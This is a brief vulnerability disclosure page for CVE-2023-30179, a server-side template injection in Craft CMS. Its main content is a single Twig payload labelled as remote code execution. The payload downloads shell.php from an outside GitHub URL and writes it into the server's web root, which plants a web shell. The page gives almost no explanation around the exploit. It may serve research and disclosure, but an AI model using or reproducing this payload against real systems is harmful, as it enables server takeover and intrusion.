[CVE-2023-30179] Server-Side Template Injection





Previous[CVE-2023-30178] Server-Side Template InjectionNext[CVE-2023-33614] Reflected - Cross Site Script (XSS)
Last updated





Last updated
SSTI_UserPhotoLocation_RCE{% set source=['https://raw.githubusercontent.com/datnlq/CraftCMS/main/shell.php']|map('file_get_contents')|join %} {{{(source):"/var/www/html/craft_cms/web/shell.php"}|map("file_put_contents")|join()}}